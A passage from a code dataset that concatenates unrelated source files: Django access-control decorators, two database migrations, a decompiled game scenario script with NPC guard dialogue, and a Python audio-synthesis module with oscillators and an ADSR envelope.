def wrap(request, *args, **kwargs):
member = TeamMember.objects.get(Q(teamName = kwargs['team'] ) & Q(userName = request.user ))
tes=Role.objects.get(role="Tester")
print("hi")
if member.role == tes:
print("bye")
return function(request, *args, **kwargs)
else:
return render(request, 'errorconnected.html')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
def userIsMember(function):
def wrap(request, *args, **kwargs):
member = TeamMember.objects.filter(Q(teamName = kwargs['team'] ) & Q(userName = request.user ))
if member:
return function(request, *args, **kwargs)
else:
return render(request, 'errorconnected.html')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
|
994,996 | b07a81276863e7cd0fac8e2ad78d131e0f30ed0b | # ----------------------------------------------------------------------
# initial
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from django.db import models
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
depends_on = [("main", "0001_initial")]
def migrate(self):
# Adding model 'TimeSeries'
self.db.create_table(
"pm_timeseries",
(
("id", models.AutoField(primary_key=True)),
("name", models.CharField("Name", unique=True, max_length=128)),
("is_enabled", models.BooleanField("Is Enabled?", default=True)),
),
)
TimeSeries = self.db.mock_model(model_name="TimeSeries", db_table="pm_timeseries")
# Adding model 'TimeSeriesData'
self.db.create_table(
"pm_timeseriesdata",
(
("id", models.AutoField(primary_key=True)),
(
"time_series",
models.ForeignKey(
TimeSeries, verbose_name="Time Series", on_delete=models.CASCADE
),
),
("timestamp", models.IntegerField("Timestamp")),
("value", models.FloatField("Value", null=True, blank=True)),
),
)
self.db.create_index("pm_timeseriesdata", ["timestamp"], unique=False)
#
self.db.create_table(
"pm_chart",
(
("id", models.AutoField(primary_key=True)),
("name", models.CharField("Name", unique=True, max_length=128)),
),
)
Chart = self.db.mock_model(model_name="Chart", db_table="pm_chart")
#
self.db.create_table(
"pm_chart_time_series",
(
("id", models.AutoField(verbose_name="ID", primary_key=True, auto_created=True)),
("chart", models.ForeignKey(Chart, null=False, on_delete=models.CASCADE)),
("timeseries", models.ForeignKey(TimeSeries, null=False, on_delete=models.CASCADE)),
),
)
#
self.db.execute(SP_CREATE)
SP_CREATE = """
CREATE OR REPLACE
FUNCTION pm_timeseries_register(CHAR,INTEGER,DOUBLE PRECISION)
RETURNS VOID
AS
$$
DECLARE
p_ts_name ALIAS FOR $1;
p_timestamp ALIAS FOR $2;
p_value ALIAS FOR $3;
ts_id INTEGER;
BEGIN
LOOP
SELECT id
INTO ts_id
FROM pm_timeseries
WHERE name=p_ts_name;
IF FOUND THEN
EXIT;
ELSE
INSERT INTO pm_timeseries(name)
VALUES(p_ts_name);
END IF;
END LOOP;
INSERT INTO pm_timeseriesdata(time_series_id,timestamp,value)
VALUES(ts_id,p_timestamp,p_value);
END;
$$ LANGUAGE plpgsql;
"""
SP_DROP = "DROP FUNCTION pm_timeseries_register(CHAR,INTEGER,DOUBLE PRECISION)"
|
994,997 | f852fbdfcfa0f8b4565618740c4f5677630bd3b8 | from ED6ScenarioHelper import *
def main():
SetCodePage("ms932")
CreateScenaFile(
FileName = 'T0601 ._SN',
MapName = 'Rolent',
Location = 'T0601.x',
MapIndex = 17,
MapDefaultBGM = "ed60016",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'Private Selbourne', # 9
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 17,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT07/CH01640 ._CH', # 00
)
AddCharChipPat(
'ED6_DT07/CH01640P._CP', # 00
)
DeclNpc(
X = -940,
Z = 7250,
Y = -94770,
Direction = 180,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 4,
)
ScpFunction(
"Function_0_D2", # 00, 0
"Function_1_D3", # 01, 1
"Function_2_E6", # 02, 2
"Function_3_FC", # 03, 3
"Function_4_120", # 04, 4
)
def Function_0_D2(): pass
label("Function_0_D2")
Return()
# Function_0_D2 end
def Function_1_D3(): pass
label("Function_1_D3")
OP_16(0x2, 0xFA0, 0xFFFE0818, 0xFFFD7790, 0x30012)
Return()
# Function_1_D3 end
def Function_2_E6(): pass
label("Function_2_E6")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_FB")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_2_E6")
label("loc_FB")
Return()
# Function_2_E6 end
def Function_3_FC(): pass
label("Function_3_FC")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_11F")
OP_8D(0xFE, -3140, -97580, 1480, -73120, 3000)
Jump("Function_3_FC")
label("loc_11F")
Return()
# Function_3_FC end
def Function_4_120(): pass
label("Function_4_120")
TalkBegin(0xFE)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC9, 1)), scpexpr(EXPR_END)), "loc_2B2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_1D6")
ChrTalk( #0
0xFE,
(
"When I was standing guard here\x01",
"before, I could have sworn I saw\x01",
"a little girl.\x02",
)
)
CloseMessageWindow()
ChrTalk( #1
0xFE,
(
"But when I rubbed my eyes and\x01",
"looked again, she was nowhere\x01",
"to be found.\x02",
)
)
CloseMessageWindow()
Jump("loc_2AF")
label("loc_1D6")
OP_A2(0x0)
ChrTalk( #2
0xFE,
(
"When I was standing guard here\x01",
"before, I could have sworn I saw\x01",
"a little girl.\x02",
)
)
CloseMessageWindow()
ChrTalk( #3
0xFE,
(
"But when I rubbed my eyes and\x01",
"looked again, she was nowhere\x01",
"to be found.\x02",
)
)
CloseMessageWindow()
ChrTalk( #4
0xFE,
(
"I wonder if I'm running on too\x01",
"little sleep...\x02",
)
)
CloseMessageWindow()
label("loc_2AF")
Jump("loc_14D5")
label("loc_2B2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC5, 7)), scpexpr(EXPR_END)), "loc_38D")
ChrTalk( #5
0xFE,
(
"Today is the finals for the Martial\x01",
"Arts Competition.\x02",
)
)
CloseMessageWindow()
ChrTalk( #6
0xFE,
(
"I should have guessed that the\x01",
"Special Ops Unit would make it\x01",
"to the final round...\x02",
)
)
CloseMessageWindow()
ChrTalk( #7
0xFE,
(
"Though I don't want to admit it,\x01",
"they're a tough bunch.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_38D")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC4, 1)), scpexpr(EXPR_END)), "loc_46A")
ChrTalk( #8
0xFE,
(
"Starting today, the number of times\x01",
"I'll need to patrol has increased.\x02",
)
)
CloseMessageWindow()
ChrTalk( #9
0xFE,
(
"Though we haven't received any information,\x01",
"I can only imagine that those responsible\x01",
"for the terrorist acts haven't been caught.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_46A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC3, 1)), scpexpr(EXPR_END)), "loc_667")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_54C")
ChrTalk( #10
0xFE,
(
"The Erbe Scenic Route is surrounded\x01",
"by beautiful greenery and is normally\x01",
"the perfect spot for a stroll.\x02",
)
)
CloseMessageWindow()
ChrTalk( #11
0xFE,
(
"However, all I can see now are leafy\x01",
"thickets that could be hiding the\x01",
"terrorist criminals...\x02",
)
)
CloseMessageWindow()
Jump("loc_664")
label("loc_54C")
OP_A2(0x0)
ChrTalk( #12
0xFE,
(
"The Erbe Scenic Route is surrounded\x01",
"by beautiful greenery and is normally\x01",
"the perfect spot for a stroll.\x02",
)
)
CloseMessageWindow()
ChrTalk( #13
0xFE,
(
"And the area is considered a park\x01",
"for the citizens of Grancel.\x02",
)
)
CloseMessageWindow()
ChrTalk( #14
0xFE,
(
"However, all I can see now are leafy\x01",
"thickets that could be hiding the\x01",
"terrorist criminals...\x02",
)
)
CloseMessageWindow()
label("loc_664")
Jump("loc_14D5")
label("loc_667")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC1, 0)), scpexpr(EXPR_END)), "loc_74A")
ChrTalk( #15
0xFE,
(
"I haven't seen any of the Royal Guard in\x01",
"the area, so I could say that things here\x01",
"are pretty peaceful at the moment.\x02",
)
)
CloseMessageWindow()
ChrTalk( #16
0xFE,
(
"But I'm sure those standing guard\x01",
"in the Royal City are under a lot\x01",
"of stress right now.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_74A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 6)), scpexpr(EXPR_END)), "loc_ABC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xDD, 1)), scpexpr(EXPR_END)), "loc_89B")
ChrTalk( #17
0xFE,
(
"Because of the size of this place,\x01",
"patrolling it is one of the biggest\x01",
"challenges.\x02",
)
)
CloseMessageWindow()
ChrTalk( #18
0xFE,
(
"Since all of the tourists are concentrated\x01",
"in the Royal City at the moment, this\x01",
"place is a bit more relaxed, but...\x02",
)
)
CloseMessageWindow()
ChrTalk( #19
0xFE,
(
"If one of the terrorists were among\x01",
"the tourists, we'd have no real way\x01",
"of knowing. It's a little scary!\x02",
)
)
CloseMessageWindow()
Jump("loc_AB9")
label("loc_89B")
OP_A2(0x6E9)
ChrTalk( #20
0xFE,
(
"Good work making it all the\x01",
"way up here.\x02",
)
)
CloseMessageWindow()
ChrTalk( #21
0xFE,
(
"I'll give you this as a souvenir.\x01",
"Ha ha, don't mind that it's a\x01",
"hand-me-down from me.\x02",
)
)
CloseMessageWindow()
OP_3E(0x21A, 1)
FadeToDark(300, 0, 100)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
OP_22(0x11, 0x0, 0x64)
AnonymousTalk( #22
"\x07\x00Received \x07\x02Carnelia - Chapter 9\x07\x00.\x02",
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
ChrTalk( #23
0xFE,
(
"Because of the size of this place,\x01",
"patrolling it is one of the biggest\x01",
"challenges.\x02",
)
)
CloseMessageWindow()
ChrTalk( #24
0xFE,
(
"Since all of the tourists are concentrated\x01",
"in the Royal City at the moment, this\x01",
"place is a bit more relaxed, but...\x02",
)
)
CloseMessageWindow()
ChrTalk( #25
0xFE,
(
"If one of the terrorists were among\x01",
"the tourists, we'd have no real way\x01",
"of knowing. It's a little scary!\x02",
)
)
CloseMessageWindow()
label("loc_AB9")
Jump("loc_14D5")
label("loc_ABC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4D, 0)), scpexpr(EXPR_END)), "loc_B48")
ChrTalk( #26
0xFE,
(
"The airliners usually pass directly\x01",
"overhead, but not today.\x02",
)
)
CloseMessageWindow()
ChrTalk( #27
0xFE,
(
"I guess the rumor that all flights\x01",
"were canceled was true.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_B48")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4C, 1)), scpexpr(EXPR_END)), "loc_C3B")
ChrTalk( #28
0xFE,
(
"I guess it's about time for\x01",
"my shift replacement.\x02",
)
)
CloseMessageWindow()
ChrTalk( #29
0xFE,
(
"The cool air inside feels so\x01",
"good after spending a day out\x01",
"here standing guard.\x02",
)
)
CloseMessageWindow()
ChrTalk( #30
0xFE,
(
"All right, maybe I'll have a drink\x01",
"down in the mess hall for the\x01",
"first time in a while.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_C3B")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4B, 1)), scpexpr(EXPR_END)), "loc_E96")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_DAC")
OP_A2(0x0)
ChrTalk( #31
0xFE,
(
"Scholars and others sometimes\x01",
"come to investigate this place.\x02",
)
)
CloseMessageWindow()
ChrTalk( #32
0xFE,
(
"It seems they're interested because\x01",
"this place is actually an ancient\x01",
"ruin from long ago.\x02",
)
)
CloseMessageWindow()
ChrTalk( #33
0xFE,
(
"I guess people into old places just\x01",
"can't resist coming here...\x02",
)
)
CloseMessageWindow()
ChrTalk( #34
0xFE,
(
"Can't really see the appeal myself. It's not\x01",
"a treasure trove of knowledge so much as it\x01",
"is a workplace for me.\x02",
)
)
CloseMessageWindow()
Jump("loc_E93")
label("loc_DAC")
ChrTalk( #35
0xFE,
(
"Scholars sometimes come to\x01",
"investigate this place.\x02",
)
)
CloseMessageWindow()
ChrTalk( #36
0xFE,
(
"It seems they're interested because\x01",
"this place is actually an ancient\x01",
"ruin from long ago.\x02",
)
)
CloseMessageWindow()
ChrTalk( #37
0xFE,
(
"I wonder if people interested in old\x01",
"places just can't resist coming here.\x02",
)
)
CloseMessageWindow()
label("loc_E93")
Jump("loc_14D5")
label("loc_E96")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x49, 7)), scpexpr(EXPR_END)), "loc_1172")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_10CB")
OP_A2(0x0)
ChrTalk( #38
0xFE,
(
"Not too long ago, my only\x01",
"daughter came to visit.\x02",
)
)
CloseMessageWindow()
ChrTalk( #39
0xFE,
(
"When I told her this is where\x01",
"I worked, she was so jealous.\x02",
)
)
CloseMessageWindow()
ChrTalk( #40
0xFE,
"It's nice that children are so meek...\x02",
)
CloseMessageWindow()
ChrTalk( #41
0xFE,
(
"Now it's nice and warm during the day,\x01",
"but standing guard out here on those\x01",
"cold winter nights is the worst.\x02",
)
)
CloseMessageWindow()
ChrTalk( #42
0xFE,
(
"It's dark, cold, the wind is unrelenting,\x01",
"my skin gets chapped, and my nose\x01",
"never stops running...\x02",
)
)
CloseMessageWindow()
ChrTalk( #43
0xFE,
(
"And on summer days, it's hotter than\x01",
"an oven, and I feel myself fading in\x01",
"and out of consciousness.\x02",
)
)
CloseMessageWindow()
ChrTalk( #44
0xFE,
(
"But the view is splendid,\x01",
"so I am glad I work here.\x02",
)
)
CloseMessageWindow()
Jump("loc_116F")
label("loc_10CB")
ChrTalk( #45
0xFE,
(
"Not too long ago, my only\x01",
"daughter came to visit.\x02",
)
)
CloseMessageWindow()
ChrTalk( #46
0xFE,
(
"When I told her this is where\x01",
"I worked, she was so jealous.\x02",
)
)
CloseMessageWindow()
ChrTalk( #47
0xFE,
"It's nice that children are so meek...\x02",
)
CloseMessageWindow()
label("loc_116F")
Jump("loc_14D5")
label("loc_1172")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x47, 1)), scpexpr(EXPR_END)), "loc_1265")
ChrTalk( #48
0xFE,
(
"There's been nothing out of\x01",
"the ordinary today.\x02",
)
)
CloseMessageWindow()
ChrTalk( #49
0xFE,
(
"Both the Grancel and Rolent sides\x01",
"are pretty quiet.\x02",
)
)
CloseMessageWindow()
ChrTalk( #50
0xFE,
(
"Ten years ago the outside of this wall\x01",
"was flooded with the Imperial Army, but\x01",
"now it's almost impossible to imagine.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_1265")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1429")
OP_A2(0x0)
ChrTalk( #51
0xFE,
"Welcome to the Ahnenburg Wall.\x02",
)
CloseMessageWindow()
ChrTalk( #52
0xFE,
(
"Have you come here to sightsee\x01",
"or investigate the ruins?\x02",
)
)
CloseMessageWindow()
ChrTalk( #53
0xFE,
(
"This wall surrounds the Grancel\x01",
"region.\x02",
)
)
CloseMessageWindow()
ChrTalk( #54
0xFE,
(
"In ancient verse, the Royal City is referred\x01",
"to as a pearl and the Ahnenburg Wall is the\x01",
"oyster shell which surrounds it.\x02",
)
)
CloseMessageWindow()
ChrTalk( #55
0xFE,
(
"I've heard that the wall is so\x01",
"old that nobody really knows\x01",
"why it was built.\x02",
)
)
CloseMessageWindow()
ChrTalk( #56
0xFE,
(
"The prevailing theory seems to\x01",
"be that it was built to prevent\x01",
"enemy invasions.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_1429")
ChrTalk( #57
0xFE,
(
"This wall surrounds the Grancel\x01",
"region.\x02",
)
)
CloseMessageWindow()
ChrTalk( #58
0xFE,
(
"In ancient verse, the Royal City is referred\x01",
"to as a pearl and the Ahnenburg Wall is the\x01",
"oyster shell which surrounds it.\x02",
)
)
CloseMessageWindow()
label("loc_14D5")
TalkEnd(0xFE)
Return()
# Function_4_120 end
SaveToFile()
Try(main)
|
994,998 | 89d2b75ea3d9cfa5a92408c18636ce21dde0e534 | # Generated by Django 2.0.2 on 2018-05-24 08:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('report_data_extract', '0055_auto_20180524_1153'),
]
operations = [
migrations.AddField(
model_name='fielddesc',
name='choices',
field=models.TextField(blank=True, default='', verbose_name='选项'),
),
migrations.AddField(
model_name='fielddesc',
name='foreignkey',
field=models.CharField(blank=True, default='', max_length=150, verbose_name='外键'),
),
migrations.AddField(
model_name='fielddesc',
name='is_unique',
field=models.CharField(blank=True, default='', max_length=150, verbose_name='是否唯一'),
),
migrations.AddField(
model_name='tabledesc',
name='unique_together',
field=models.CharField(default='', max_length=300, verbose_name='联合唯一'),
),
]
|
994,999 | 9bd800ab25a2f431decfcc8ae2fbbeca3541db2c | from collections import deque
from math import sin, cos, floor, pi, log10
from numbers import Number
from util import NamedDescriptor, NamedMeta, configable, clamp
import operator
_tau = 2*pi
class SpaceTimeContinuumError (Exception):
pass
class Signal (metaclass=NamedMeta):
"""
Signals normally operate over [-1,1]. A subclass may change this.
"""
#last_t = -1
#last_samp = None
def __call__ (self, t):
"""
Sample this signal at time index t. Each call to sample must be with a
larger value for t.
"""
#if t <= self.last_t:
#raise SpaceTimeContinuumError(
#"We're moving back in time! Last t = {}, now = {}".format(
#self.last_t, t))
#samp = self._sample(t)
#self.last_t = t
#self.last_samp = samp
#return samp
pass
class Const (Signal):
def __init__ (self, val):
self.val = val if val is not None else 0
def __call__ (self, t):
return self.val
def asInput (input, type=None, const_type=Const, **kwargs):
if not isinstance(input, Signal):
if const_type is None:
# TODO: This None -> 0 conversion is hacky
if input is None:
input = 0
return input
else:
input = const_type(input)
if type and not isinstance(input, type):
input = type(input, **kwargs)
return input
class Input (NamedDescriptor):
def __init__ (self, type=None, const_type=Const, **kwargs):
self.type = type
self.const_type = const_type
self.kwargs = kwargs
def __set__ (self, instance, value):
super().__set__(instance, asInput(value, self.type,
const_type=self.const_type,
**self.kwargs))
class FrequencySignal (Signal):
"""
Frequency channels operate over [0,11000]
"""
input = Input()
def __init__ (self, input):
self.input = input
def __call__ (self, t):
return (self._input(t)+1)*5500
class ConstFrequency (Const, FrequencySignal):
def __init__ (self, val):
if isinstance(val, Number) and -1 <= val <= 1:
val = (val+1)*5500
super().__init__(val)
class TriggerSignal (Signal):
"""
Outputs a sample of 1 for one sample when the input signal crosses the
threshold. Only after the input signal has dropped below the threshold will
the TriggerSignal be ready to be triggered again.
"""
input = Input()
thresh = Input()
def __init__ (self, input, thresh=0.5):
self.input = input
self.thresh = thresh
self.hot = False
def __call__ (self, t):
samp = self.input(t)
thresh = self.thresh(t)
if not self.hot and samp >= thresh:
self.hot = True
return 1
if self.hot and samp < thresh:
self.hot = False
return 0
class Trigger (TriggerSignal):
def __init__ (self):
self.firing = False
def fire (self):
self.firing = True
def __call__ (self, t):
if self.firing:
self.firing = False
return 1
return 0
class GateSignal (Signal):
"""
Outputs a sample of 1 if the input signal is >= the threshold, otherwise the
output is 0.
"""
input = Input()
thresh = Input()
def __init__ (self, input, thresh=0.5):
self.input = input
self.thresh = thresh
def __call__ (self, t):
return 0 if self.input(t) < self.thresh(t) else 1
class Gate (GateSignal):
def __init__ (self):
self.open = 0
def on (self):
self.open = 1
def off (self):
self.open = 0
def __call__ (self, t):
return self.open
class PositiveSignal (Signal):
input = Input()
def __init__ (self, input):
self.input = input
def __call__ (self, t):
return (self._input(t) + 1)/2
class LinearRamp (Signal):
def __init__ (self, t_start, dur, begin=-1, end=1):
self.t_start = t_start
self.dur = dur
self.begin = begin
self.end = end
def __call__ (self, t):
if t < self.t_start:
return self.begin
if t > self.t_start + self.dur:
return self.end
return (t - self.t_start) / self.dur * (self.end - self.begin) + self.begin
class SegmentedRamp (Signal):
def __init__ (self, dur, steps, low=0, high=1):
self.dur = dur
self.steps = iter(steps)
self.low = low
self.high = high
self.next_t = 0
self.next_val = 0
self._next()
def _next (self):
self.cur_t = self.next_t
self.cur_val = self.next_val
start_t, val = next(self.steps)
start_t *= self.dur
val = (self.high - self.low) * val + self.low
self.next_t = start_t
self.next_val = val
def __call__ (self, t):
try:
while self.next_t <= t:
self._next()
except StopIteration:
return self.cur_val
if t > self.dur:
return self.cur_val
return ((t - self.cur_t) / (self.next_t - self.cur_t) *
(self.next_val - self.cur_val) + self.cur_val)
class PolyRamp (Signal):
def __init__ (self, t_start, dur, power=2):
self.t_start = t_start
self.dur = dur
self.power = power
def __call__ (self, t):
if t < self.t_start:
return -1
if t > self.t_start + self.dur:
return 1
return ((t - self.t_start)/self.dur)**self.power * 2 - 1
class ExpRamp (Signal):
def __init__ (self, t_start, dur):
self.t_start = t_start
self.dur = dur
def __call__ (self, t):
if t < self.t_start:
return -1
if t > self.t_start + self.dur:
return 1
return (10**((t - self.t_start)/self.dur) - 1)/9 * 2 - 1
class LogRamp (Signal):
def __init__ (self, t_start, dur):
self.t_start = t_start
self.dur = dur
def __call__ (self, t):
if t < self.t_start:
return -1
if t > self.t_start + self.dur:
return 1
return log10(((t - self.t_start)/self.dur)*9 + 1) * 2 - 1
class ADSREnvelope (PositiveSignal):
A = Input()
D = Input()
S = Input()
R = Input()
trigger = Input(TriggerSignal)
gate = Input(GateSignal)
def __init__ (self, A=None, D=None, S=None, R=None, trigger=None,
gate=None):
self.A = A
self.D = D
self.S = S
self.R = R
self.trigger = trigger
self.gate = gate
self.start_A = None
self.start_R = None
self.last_samp = 0
self.last_t = -1/DEFAULT_SAMPLERATE
def __call__ (self, t):
trigger = self._trigger(t)
gate = self._gate(t)
if trigger:
self.start_A = t
self.start_R = None
samp = 0
S = self._S(t)
if gate:
A = self._A(t)
D = self._D(t)
start_D = self.start_A + A
start_S = start_D + D
if self.start_A <= t < start_D:
# Attack
samp = (self.last_samp +
(1 - self.last_samp)/(self.start_A + A - t)*(t - self.last_t))
elif start_D <= t < start_S:
# Decay
samp = 1 - (t - start_D)*(1-S)/D
else:
# Sustain
samp = S
elif self.last_samp:
# Release...
if not self.start_R:
self.start_R = t
R = self._R(t)
if self.start_R <= t < self.start_R + R:
samp = (self.last_samp -
self.last_samp/(self.start_R + R - t)*(t - self.last_t))
self.last_samp = samp
self.last_t = t
return samp
def p2f (p):
"""
Pitch signal is defined in the range [-1,1].
"""
#return 11000**((p+1)/2)
#return (p+1)*11000
return (p+1)*5500
def f2p (f):
"""
#Frequency signal is defined in the range [0,22000]
Frequency signal is defined in the range [0,11000]
"""
#return 2*math.log(f, 11000) - 1
#return f/11000 - 1
return f/5500 - 1
class PhasedSignal (Signal):
#freq = Input(FrequencySignal, const_type=ConstFrequency)
freq = Input(FrequencySignal, const_type=None)
def __init__ (self, freq=None):
self.freq = freq
self.pa = 0
self.last_t = 0
def __call__ (self, t):
dt = t - self.last_t
self.last_t = t
f = self._freq
if callable(f):
f = f(t)
df = floor(dt*f * 2.0**24)
self.pa = (self.pa + df) & 0xFFFFFF
return self._phase[self.pa >> 14]
class Sine (PhasedSignal):
_phase = [sin(_tau*p/1024) for p in range(1024)]
class Cosine (PhasedSignal):
_phase = [cos(_tau*p/1024) for p in range(1024)]
class Saw (PhasedSignal):
_phase = [1 - 2*p/1024 for p in range(1024)]
class Square (PhasedSignal):
_phase = [1 if p/1024 < 1/2 else -1 for p in range(1024)]
class Triangle (PhasedSignal):
_phase = [2*abs(Saw._phase[(p - 256) % 1024]) - 1 for p in range(1024)]
def FourierSaw (harmonics):
class FourierSaw (PhasedSignal):
_phase = [2/pi * sum(sin(_tau*h * p/1024)/h for h in range(1, harmonics+1))
for p in range(1024)]
return FourierSaw
def FourierSquare (harmonics):
class FourierSquare (PhasedSignal):
_phase = [4/pi * sum(sin(_tau*(2*h - 1) * p/1024)/(2*h - 1)
for h in range(1, harmonics+1))
for p in range(1024)]
return FourierSquare
def FourierTriangle (harmonics):
class FourierTriangle (PhasedSignal):
_phase = [8/pi**2 * sum((-1)**h * sin(_tau*(2*h - 1) * p/1024)/(2*h - 1)**2
for h in range(1, harmonics+1))
for p in range(1024)]
return FourierTriangle
class Amp (Signal):
input = Input()
ratio = Input(PositiveSignal)
def __init__ (self, ratio, input):
self.ratio = ratio
self.input = input
def __call__ (self, t):
return self._ratio(t) * self._input(t)
def BinaryMod (func):
def Mod (mod, carrier):
class BinaryMod (type(carrier)):
left = Input()
right = Input()
def __init__ (self, left, right):
self.left = left
self.right = right
def __call__ (self, t):
return func(self._left(t), self._right(t))
return BinaryMod(mod, carrier)
return Mod
Mult = BinaryMod(operator.mul)
Bias = BinaryMod(operator.add)
#def Mult (factor, carrier):
#class Mult (type(carrier)):
#left = Input()
#right = Input()
#def __init__ (self, left, right):
#self.left = left
#self.right = right
#def __call__ (self, t):
#return self._left(t) * self._right(t)
#return Mult(factor, carrier)
class OldBias (Signal):
input = Input()
offset = Input()
def __init__ (self, offset, input):
self.offset = offset
self.input = input
def __call__ (self, t):
return self._offset(t) + self._input(t)
class Sequence (Signal):
def __init__ (self, steps=[]):
self.steps = iter(steps)
self.until = -1
self.value = 0
self.trigger = Trigger()
self.gate = Gate()
def __call__ (self, t):
if t > self.until:
try:
next_value, dur = next(self.steps)
print('Sequence:', next_value, dur)
self.until = t + dur
except StopIteration:
next_value = None
self.until = -1
if next_value is None:
self.gate.off()
# Keep our previous self.value
else:
self.trigger.fire()
self.gate.on()
self.value = next_value
return self.value
class FrequencySequence (Sequence, FrequencySignal):
pass
def Synth (steps=[], oscillator=Sine, modifier=None,
A=0.1, D=0.1, S=0.5, R=0.1):
sequencer = FrequencySequence(steps)
freq_input = sequencer
if callable(modifier):
freq_input = modifier(freq_input)
oscillator = oscillator(freq_input)
envelope = ADSREnvelope(A, D, S, R, sequencer.trigger, sequencer.gate)
return Amp(envelope, oscillator)
def AMSynth (input, factor=2):
carrier = Sine(input)
modulator = Sine(Mult(factor, input))
return Amp(modulator, carrier)
@configable
def FMSynth (input, H=1, B=1):
f_modulator = Mult(H, input)
d_carrier = Mult(B, f_modulator)
modulator_osc = Sine(f_modulator)
modulator = Mult(d_carrier, modulator_osc)
return Cosine(Bias(modulator, input))
def RMSynth (input, freq=50):
carrier = Sine(input)
modulator = Sine(freq)
return Mult(modulator, carrier)
@configable
def Vibrato (input, freq=6, cents=50):
modulator = OldBias(1, Mult(0.0005946*cents, Sine(freq)))
return Mult(modulator, input)
def Mixer (synths):
numSamps = len(synths)
def output (t):
return sum(synth(t) for synth in synths)/numSamps
return output
def Sampler (input, sample_rate, dur=None):
sample_dur = 1/sample_rate
t = 0
while True:
yield input(t)
t += sample_dur
if dur and t > dur:
break
CHANNELS = 1
DEFAULT_SAMPLERATE = 44100//2
def play (input, dur):
import alsaaudio
from util import chunk
out = alsaaudio.PCM()
out.setchannels(CHANNELS)
out.setformat(alsaaudio.PCM_FORMAT_S16_LE)
SAMPLERATE = out.setrate(DEFAULT_SAMPLERATE)
print(SAMPLERATE)
ALSAPERIOD = out.setperiodsize(SAMPLERATE//4)
total = 0
for bs in chunk(Sampler(input, SAMPLERATE, dur), ALSAPERIOD*CHANNELS):
wrote = out.write(bs)
total += wrote
print(wrote, total)
if wrote != ALSAPERIOD:
print("Huh? Only wrote {}/{}".format(wrote, ALSAPERIOD))
print('Closing...')
out.close()
def write (input, dur, filename='out.wav'):
print(DEFAULT_SAMPLERATE)
import wave, array
from util import byte_array
bytes = byte_array(Sampler(input, DEFAULT_SAMPLERATE, dur))
#bytes = array.array('f', Sampler(input, DEFAULT_SAMPLERATE*2, dur))
#f = wave.open(filename, 'w')
#f.setnchannels(CHANNELS)
#f.setsampwidth(2)
#f.setframerate(DEFAULT_SAMPLERATE)
#f.setcomptype('NONE', 'not compressed')
#f.setnframes(len(bytes))
#f.writeframesraw(bytes)
#print(f._datawritten, f._nframeswritten)
#f.close()
with open(filename + '.raw', 'wb') as rf:
rf.write(bytes)
def generate (input, dur):
""" For profiling. """
